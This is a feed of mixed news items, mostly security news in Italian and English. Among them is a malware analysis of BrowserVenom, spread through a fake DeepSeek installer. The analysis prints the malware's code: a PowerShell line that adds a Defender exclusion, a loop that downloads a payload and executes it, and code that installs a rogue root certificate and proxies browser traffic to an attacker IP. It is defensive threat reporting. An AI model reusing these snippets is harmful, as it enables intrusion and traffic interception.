Il mese prossimo, Outlook Web e il nuovo Outlook per Windows amplieranno l’elenco degli allegati bloccati, ha annunciato Microsoft. A partire da luglio 2025, Outlook bloccherà i file .library-ms e .search-ms.

“Nell’ambito dei nostri continui sforzi per migliorare la sicurezza di Outlook Web e del nuovo Outlook per Windows, stiamo aggiornando l’elenco dei tipi di file bloccati predefiniti in OwaMailboxPolicy. A partire dall’inizio di luglio 2025, i tipi di file [.library-ms e .search-ms] verranno aggiunti all’elenco BlockedFileTypes”, ha scritto l’azienda.

I file .library-ms (in Windows definiscono librerie che combinano cartelle locali e remote in un’unica visualizzazione di Explorer) sono stati utilizzati negli attacchi di phishing dall’inizio del 2025. Tali file sono stati utilizzati per attaccare organizzazioni governative e aziende private e sfruttare la vulnerabilità CVE-2025-24054, che espone gli hash NTLM.

Il gestore URI del protocollo search-ms è stato utilizzato dai phisher almeno da giugno 2022, quando Matthew Hickey, co-fondatore di Hacker House e ricercatore di sicurezza, ha scoperto che poteva usare search-ms e il problema CVE-2022-30190 per avviare automaticamente le finestre di ricerca di Windows sui dispositivi dei destinatari, inducendoli a eseguire malware.

“I nuovi tipi di file bloccati vengono utilizzati raramente, quindi la maggior parte delle organizzazioni non sarà interessata da questa modifica. Tuttavia, se gli utenti inviano o ricevono questi allegati, non saranno più in grado di aprirli o scaricarli in Outlook Web o nel nuovo Outlook per Windows”, avverte Microsoft.

“Se l’organizzazione non utilizza questi tipi di file, non è necessario intraprendere alcuna azione. L’aggiornamento verrà applicato automaticamente a tutti i criteri cassetta postale di OWA. Tuttavia, se è necessario consentire questi tipi di file, è possibile includerli in AllowedFileTypes in OwaMailboxPolicy prima di distribuire l’aggiornamento”. Per un elenco completo degli allegati attualmente bloccati in Outlook, consultare la documentazione Microsoft.

Ricordiamo che Microsoft ha una lunga storia di rimozione e disabilitazione di diverse funzionalità di Office e Windows che vengono utilizzate impropriamente dagli hacker. Ad esempio, nel 2018, l’azienda ha ampliato il supporto di Antimalware Scan Interface (AMSI) per le applicazioni client di Office 365 per bloccare gli attacchi che utilizzano macro VBA.

Da allora, l’azienda ha iniziato a bloccare le macro VBA per impostazione predefinita, ha disabilitato le macro di Excel 4.0 (XLM), ha introdotto la protezione per le macro XLM e ha iniziato a bloccare i componenti aggiuntivi XLL non attendibili per impostazione predefinita in tutti i tenant di Microsoft 365.

Inoltre, a maggio dell’anno scorso, Microsoft ha annunciato la dismissione di VBScript e ad aprile 2025 ha annunciato la disattivazione di tutti i controlli ActiveX nelle versioni Windows delle applicazioni Microsoft 365 e Office 2024.

L'articolo Microsoft blocca nuovi allegati su Outlook! Stop ai file usati dagli hacker nelle email di Phishing proviene da il blog della sicurezza informatica.

Privacy International investigated eight of the most popular period-tracking apps to analyse how they function and process users’ reproductive health data. Their findings raised concerns for users’ privacy, given the sensitive nature of the health data involved. These findings come within the context of the global roll back on reproductive rights and fears over law enforcement forcing apps to hand over data.

The post All Eyes on my Period? Period tracking apps and the future of privacy in a post-Roe world appeared first on European Digital Rights (EDRi).

European Parliament's LIBE committee vote on a reform of the Europol Regulation was a mixed bag. Although it was a blow to the European Commission's original proposal, it still legitimised an expanding surveillance regime thanks to Europol's ever-growing power and resources. Read the Protect Not Surveil coalition’s statement.

The post LIBE vote on Europol reform blow to the Commission, but still legitimises an expanding surveillance regime appeared first on European Digital Rights (EDRi).

As common as uranium is in the ground around us, the world’s oceans contain a thousand times more uranium (~4.5 billion tons) than can be mined today. This makes extracting uranium as well as other resources from seawater a very interesting proposition, albeit it one that requires finding a technological solution to not only filter out these highly diluted substances, but also do so in a way that’s economically viable. Now it seems that Chinese researchers have recently come tantalizingly close to achieving this goal.
The anode chemical reaction to extract uranium. (Credit: Wang et al., Nature Sustainability, 2025)
The used electrochemical method is described in the paper (gift link) by [Yanjing Wang] et al., as published in Nature Sustainability. The claimed recovery cost of up to 100% of the uranium in the seawater is approximately $83/kilogram, which would be much cheaper than previous methods and is within striking distance of current uranium spot prices at about $70 – 85.

Of course, the challenge is to scale up this lab-sized prototype into something more industrial-sized. What’s interesting about this low-voltage method is that the conversion of uranium oxide ions to solid uranium oxides occurs at both the anode and cathode unlike with previous electrochemical methods. The copper anode becomes part of the electrochemical process, with UO₂ deposited on the cathode and U₃O₈ on the anode.

Among the reported performance statistics of this prototype are the ability to extract UO₂²⁺ ions from an NaCl solution at concentrations ranging from 1 – 50 ppm. At 20 ppm and in the presence of Cl^– ions (as is typical in seawater), the extraction rate was about 100%, compared to ~9.1% for the adsorption method. All of this required only a cell voltage of 0.6 V with 50 mA current, while being highly uranium-selective. Copper pollution of the water is also prevented, as the dissolved copper from the anode was found on the cathode after testing.

The process was tested on actual seawater (East & South China Sea), with ten hours of operation resulting in a recovery rate of 100% and 85.3% respectively. With potential electrode optimizations suggested by the authors, this extraction method might prove to be a viable way to not only recover uranium from seawater, but also at uranium mining facilities and more.

hackaday.com/2025/06/11/bipola…

Mozilla ha sviluppato una nuova funzionalità di sicurezza che aiuterà a bloccare le estensioni dannose di Firefox che rubano criptovalute agli utenti. Gli sviluppatori segnalano che il nuovo sistema crea profili di rischio per ogni estensione del portafoglio presentata nello store e avvisa automaticamente dei rischi se viene raggiunta una soglia specificata.

Questi avvisi hanno lo scopo di incoraggiare le persone che esaminano i componenti aggiuntivi a esaminarli più attentamente e a rimuovere quelli dannosi dallo store prima che vengano utilizzati per svuotare i portafogli crittografici degli utenti.

“Per proteggere gli utenti di Firefox, il team Add-ons Operations ha sviluppato un sistema di pre-rilevamento progettato per identificare e bloccare le estensioni fraudolente per criptovalute prima che cadano nelle mani di utenti ignari”, afferma il team. “Il primo livello di protezione prevede indicatori automatici che determinano il profilo di rischio delle estensioni per wallet elencate su addons.mozilla.org.

Se un’estensione per wallet raggiunge un certo livello di rischio, i revisori umani vengono avvisati per condurre un’analisi più approfondita. Se l’estensione viene ritenuta dannosa, viene immediatamente bloccata.”

Andreas Wagner, specialista in operazioni di componenti aggiuntivi e responsabile del sistema di revisione dei contenuti e della sicurezza di addons.mozilla.org, sottolinea che negli ultimi anni il suo team ha scoperto e rimosso centinaia di estensioni dannose, tra cui wallet di criptovalute fraudolenti.

“È un continuo gioco del gatto e del topo, con gli sviluppatori che cercano di aggirare i nostri metodi di rilevamento”, spiega Wagner. “Controlla il sito web del tuo portafoglio di criptovalute per vedere se ha un’estensione ufficiale e usa solo quelle linkate sul sito ufficiale.”

L'articolo Mozilla dichiara guerra ai ladri di cripto: nuovo scudo contro estensioni pericolose su Firefox proviene da il blog della sicurezza informatica.

Introduction

DeepSeek-R1 is one of the most popular LLMs right now. Users of all experience levels look for chatbot websites on search engines, and threat actors have started abusing the popularity of LLMs. We previously reported attacks with malware being spread under the guise of DeepSeek to attract victims. The malicious domains spread through X posts and general browsing.

But lately, threat actors have begun using malvertising to exploit the demand for chatbots. For instance, we have recently discovered a new malicious campaign distributing previously unknown malware through a fake DeepSeek-R1 LLM environment installer. The malware is delivered via a phishing site that masquerades as the official DeepSeek homepage. The website was promoted in the search results via Google Ads. The attacks ultimately aim to install BrowserVenom, an implant that reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to manipulate the victim’s network traffic and collect data.

Phishing lure

The infection was launched from a phishing site, located at https[:]//deepseek-platform[.]com. It was spread via malvertising, intentionally placed as the top result when a user searched for “deepseek r1”, thus taking advantage of the model’s popularity. Once the user reaches the site, a check is performed to identify the victim’s operating system. If the user is running Windows, they will be presented with only one active button, “Try now”. We have also seen layouts for other operating systems with slight changes in wording, but all mislead the user into clicking the button.

Malicious website mimicking DeepSeek

Clicking this button will take the user to a CAPTCHA anti-bot screen. The code for this screen is obfuscated JavaScript, which performs a series of checks to make sure that the user is not a bot. We found other scripts on the same malicious domain signaling that this is not the first iteration of such campaigns. After successfully solving the CAPTCHA, the user is redirected to the proxy1.php URL path with a “Download now” button. Clicking that results in downloading the malicious installer named AI_Launcher_1.21.exe from the following URL: https://r1deepseek-ai[.]com/gg/cc/AI_Launcher_1.21.exe.

We examined the source code of both the phishing and distribution websites and discovered comments in Russian related to the websites’ functionality, which suggests that they are developed by Russian-speaking threat actors.

Malicious installer

The malicious installer AI_Launcher_1.21.exe is the launcher for the next-stage malware. Once this binary is executed, it opens a window that mimics a Cloudflare CAPTCHA.

The second fake CAPTCHA

This is another fake CAPTCHA that is loaded from https[:]//casoredkff[.]pro/captcha. After the checkbox is ticked, the URL is appended with /success, and the user is presented with the following screen, offering the options to download and install Ollama and LM Studio.

Two options to install abused LLM frameworks

Clicking either of the “Install” buttons effectively downloads and executes the respective installer, but with a caveat: another function runs concurrently: MLInstaller.Runner.Run(). This function triggers the infectious part of the implant.
private async void lmBtn_Click(object sender, EventArgs e)
{
try
{
MainFrm.<>c__DisplayClass5_0 CS$<>8__locals1 = new MainFrm.<>c__DisplayClass5_0();
this.lmBtn.Text = "Downloading..";
this.lmBtn.Enabled = false;
Action action;
if ((action = MainFrm.<>O.<0>__Run) == null)
{
action = (MainFrm.<>O.<0>__Run = new Action(Runner.Run)); # <--- malware initialization
}
Task.Run(action);
CS$<>8__locals1.ollamaPath = Path.Combine(Path.GetTempPath(), "LM-Studio-0.3.9-6-x64.exe");
[...]
When the MLInstaller.Runner.Run() function is executed in a separate thread on the machine, the infection develops in the following three steps:

1. First, the malicious function tries to exclude the user’s folder from Windows Defender’s protection by decrypting a buffer using the AES encryption algorithm.
   The AES encryption information is hardcoded in the implant:

   Type	AES-256-CBC
   Key	01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20
   IV	01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10

   The decrypted buffer contains a PowerShell command that performs the exclusion once executed by the malicious function.
   powershell.exe -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $USERPROFILE
   It should be noted that this command needs administrator privileges and will fail in case the user lacks them.

2. After that, another PowerShell command runs, downloading an executable from a malicious domain whose name is derived with a simple domain generation algorithm (DGA). The downloaded executable is saved as %USERPROFILE%\Music\1.exe under the user’s profile and then executed.$ap = "/api/getFile?fn=lai.exe";
   $b = $null;
   foreach($i in 0..1000000) {
   $s = if ($i - gt 0) {
   $i
   } else {
   ""
   };
   $d = "https://app-updater$s.app$ap";
   $b = (New - Object Net.WebClient).DownloadData($d);
   if ($b) {
   break
   }

   };
   if ([Runtime.InteropServices.RuntimeEnvironment]::GetSystemVersion() - match"^v2") {
   [IO.File]::WriteAllBytes("$env:USERPROFILE\Music\1.exe", $b);
   Start - Process "$env:USERPROFILE\Music\1.exe" - NoNewWindow
   } else {
   ([Reflection.Assembly]::Load($b)).EntryPoint.Invoke($null, $null)
   }
   At the moment of our research, there was only one domain in existence: app-updater1[.]app. No binary can be downloaded from this domain as of now but we suspect that this might be another malicious implant, such as a backdoor for further access. So far, we have managed to obtain several malicious domain names associated with this threat; they are highlighted in the IoCs section.

3. Then the MLInstaller.Runner.Run() function locates a hardcoded stage two payload in the class and variable ConfigFiles.load of the malicious installer’s buffer. This executable is decrypted with the same AES algorithm as before in order to be loaded into memory and run.

Loaded implant: BrowserVenom

We dubbed the next-stage implant BrowserVenom because it reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to sniff sensitive data and monitor the victim’s browsing activity while decrypting their traffic.

First, BrowserVenom checks if the current user has administrator rights – exiting if not – and installs a hardcoded certificate created by the threat actor:
[...]
X509Certificate2 x509Certificate = new X509Certificate2(Resources.cert);
if (RightsChecker.IsProcessRunningAsAdministrator())
{
StoreLocation storeLocation = StoreLocation.LocalMachine;
X509Store x509Store = new X509Store(StoreName.Root, storeLocation);
x509Store.Open(OpenFlags.ReadWrite);
x509Store.Add(x509Certificate);
[...]
Then the malware adds a hardcoded proxy server address to all currently installed and running browsers. For Chromium-based instances (i.e., Chrome or Microsoft Edge), it adds the proxy-server argument and modifies all existent LNK files, whereas for Gecko-based browsers, such as Mozilla or Tor Browser, the implant modifies the current user’s profile preferences:
[...]
new ChromeModifier(new string
[] {
"chrome.exe", "msedge.exe", "opera.exe", "brave.exe", "vivaldi.exe", "browser.exe", "torch.exe", "dragon.exe", "iron.exe", "epic.exe",
"blisk.exe", "colibri.exe", "centbrowser.exe", "maxthon.exe", "coccoc.exe", "slimjet.exe", "urbrowser.exe", "kiwi.exe"
}, string.Concat(new string
[] {
"--proxy-server=\"",
ProfileSettings.Host,
":",
ProfileSettings.Port,
"\""
})).ProcessShortcuts();
GeckoModifier.Modify();
[...]
The settings currently utilized by the malware are as follows:
public static readonly string Host = "141.105.130[.]106";
public static readonly string Port = "37121";
public static readonly string ID = "LauncherLM";
public static string HWID = ChromeModifier.RandomString(5);
The variables Host and Port are the ones used as the proxy settings, and the ID and HWID are appended to the browser’s User-Agent, possibly as a way to keep track of the victim’s network traffic.

Conclusion

As we have been reporting, DeepSeek has been the perfect lure for attackers to attract new victims. Threat actors’ use of new malicious tooling, such as BrowserVenom, complicates the detection of their activities. This, combined with the use of Google Ads to reach more victims and look more plausible, makes such campaigns even more effective.

At the time of our research, we detected multiple infections in Brazil, Cuba, Mexico, India, Nepal, South Africa, and Egypt. The nature of the bait and the geographic distribution of attacks indicate that campaigns like this continue to pose a global threat to unsuspecting users.

To protect against these attacks, users are advised to confirm that the results of their searches are official websites, along with their URLs and certificates, to make sure that the site is the right place to download the legitimate software from. Taking these precautions can help avoid this type of infection.

Kaspersky products detect this threat as HEUR:Trojan.Win32.Generic and Trojan.Win32.SelfDel.iwcv.

Indicators of Compromise

Hashes

d435a9a303a27c98d4e7afa157ab47de AI_Launcher_1.21.exe
dc08e0a005d64cc9e5b2fdd201f97fd6

Domains and IPs

securelist.com/browservenom-mi…

Texas lawmakers trying to muzzle campus protests have just passed one of the most ridiculous anti-speech laws in the country, as Freedom of the Press Foundation senior adviser Caitlin Vogus explains in the Houston Chronicle.

A new bill, SB 2972, would require public universities in Texas to adopt policies prohibiting “engaging in expressive activities on campus between the hours of 10 p.m. and 8 a.m.” Expressive activity includes “any speech or expressive conduct” protected by the First Amendment or Texas Constitution.

As Vogus writes, Governor Greg Abbott “should veto this unconstitutional and absurd bill before Texas has to waste taxpayers’ money defending it. And Texans should find some time — preferably at night — to exercise their First Amendment right to question the competence of the legislators who wrote or supported this bill.”

Read the whole article here.

freedom.press/issues/texas-is-…

Since it came into force almost seven years ago, the European Union (EU)'s General Data Protection Regulation (GDPR) has set the global standard for data protection. It empowers people to control their personal data while holding businesses accountable for how they collect, process, and store that data. One would imagine that all of the above would cement the GDPR, but this crucial law is being threatened by a push for profit at any cost.

The post Why the EU’s GDPR ‘simplification’ reforms could unravel hard-won protections appeared first on European Digital Rights (EDRi).

EDRi, ECNL and Lighthouse Reports are excited to launch a series of online sessions to facilitate collaboration and information sharing between journalists and civil society actors.

The post Fighting spyware – Journalism, litigation and policy after the Pegasus Scandal appeared first on European Digital Rights (EDRi).

Join the Digital Intimacy Coalition for a timely and crucial conversation on the future of adult content regulation. This webinar brings together three experts from the worlds of law, tech policy, and porn production to unpack the complex consequences of current and proposed age verification mandates

The post Age Verification and the Future of Adult Content Regulation webinar appeared first on European Digital Rights (EDRi).

Sometimes, when making a 3D printed object, plastic just isn’t enough. Probably the most common addition to our prints is the ubiquitous brass threaded inset, which has proven its worth time and again over the years in providing a secure screw attachment point with less hassle than a captive nut. Of course to insert these bits of machined brass, you need to press them in, and unless you’ve got a very good hand with a soldering iron it’s usually a good idea to use a press of some sort. [TimNummy] shows us that, ironically enough, making such a press is perfectly doable using only printed parts. Well, save for the soldering iron, of course.

He calls it the Superserter. Not only is it 100% printed plastic, but the entire design fits on a single 256 mm by 256 mm bed. In his case it was done on the Bambulab X1C, but it’s a common enough print bed size and can be printed without any supports. It’s even sized to fit the popular Gridfinity standard for a neat and tidy desk and handy bin placement for the inserts.

[TimNummy] clearly spent some time thinking about design for 3D printed manufacturing in order to create an assembly that does not need linear rails, sliders, or bearings as other press projects often do. The ironic thing is that if that same amount of effort went into other designs, it might eliminate the need for threaded inserts entirely.

If you haven’t delved into the world of threaded inserts, we put up a how-to-guide a few years ago. If you’re wondering if you can get away with just printing threads, the answer is “maybe”– we highlighted a video comparing printed threads with different inserts a while back to get you started thinking about the design limitations there.

youtube.com/embed/xoMrW3jdhm8?…

hackaday.com/2025/06/11/thread…

Gli analisti di Cisco Talos hanno segnalato che le infrastrutture critiche in Ucraina sono state attaccate da un nuovo malware che distrugge i dati chiamato PathWiper. I ricercatori scrivono che il payload è stato distribuito tramite uno strumento di amministrazione degli endpoint legittimo, il che significa che gli aggressori avevano accesso amministrativo al sistema di destinazione in anticipo.

Gli esperti paragonano PathWiper a un altro malware distruttivo, HermeticWiper (noto anche come FoxBlade, KillDisk e NEARMISS), precedentemente distribuito in Ucraina dal gruppo Sandworm. Data la somiglianza di queste minacce, si presume che PathWiper possa essere una continuazione di HermeticWiper e che il malware venga utilizzato in attacchi contro cluster di minacce identici o sovrapposti.

PathWiper viene distribuito sui sistemi di destinazione tramite un file batch di Windows che esegue un VBScript dannoso (uacinstall.vbs), che a sua volta scarica ed esegue il payload principale (sha256sum.exe). Si noti che, per eludere il rilevamento durante l’esecuzione, il malware imita il comportamento e utilizza nomi associati a uno strumento di amministrazione legittimo.

Invece di elencare semplicemente le unità fisiche come fa HermeticWiper, PathWiper identifica programmaticamente tutte le unità connesse (locali, di rete, non montate). Il malware sfrutta quindi la capacità dell’API di Windows di smontare i volumi per prepararli alla distruzione e crea un thread separato per ciascun volume per sovrascrivere le strutture NTFS critiche, tra cui:

• MBR (Master Boot Record) è il primo settore di un disco fisico, contenente il boot loader e la tabella delle partizioni;
• $MFT (Master File Table) è il file di sistema NTFS principale che contiene una directory di tutti i file e le cartelle, inclusa la loro posizione sul disco e i metadati;
• $LogFile: registro utilizzato per registrare le operazioni NTFS, tenere traccia delle modifiche ai file e verificare l’integrità e il ripristino dei dati;
• $Boot è un file contenente informazioni sul settore di avvio e sul layout del file system.

PathWiper sovrascrive tutti i file NTFS critici con byte casuali, rendendo i sistemi di destinazione completamente inutilizzabili. Poiché gli attacchi studiati non comportavano estorsione o richieste finanziarie, gli esperti concludono che il loro unico obiettivo fosse distruggere dati e compromettere i sistemi.

Gli esperti concludono che PathWiper è l’ennesima aggiunta alla lista dei programmi che hanno preso di mira l’Ucraina negli ultimi anni, tra cui WhisperGate , WhisperKill , HermeticWiper , IsaacWiper , DoubleZero , CaddyWiper e AcidRain .

L'articolo Arriva PathWiper! Il nuovo malware che devasta le infrastrutture critiche in Ucraina proviene da il blog della sicurezza informatica.

Every Thursday of the week, Bastian’s Night is broadcast from 21:30 CET (new time).

Bastian’s Night is a live talk show in German with lots of music, a weekly round-up of news from around the world, and a glimpse into the host’s crazy week in the pirate movement aka Cabinet of Curiosities.

If you want to read more about @BastianBB: –> This way

piratesonair.net/bastians-nigh…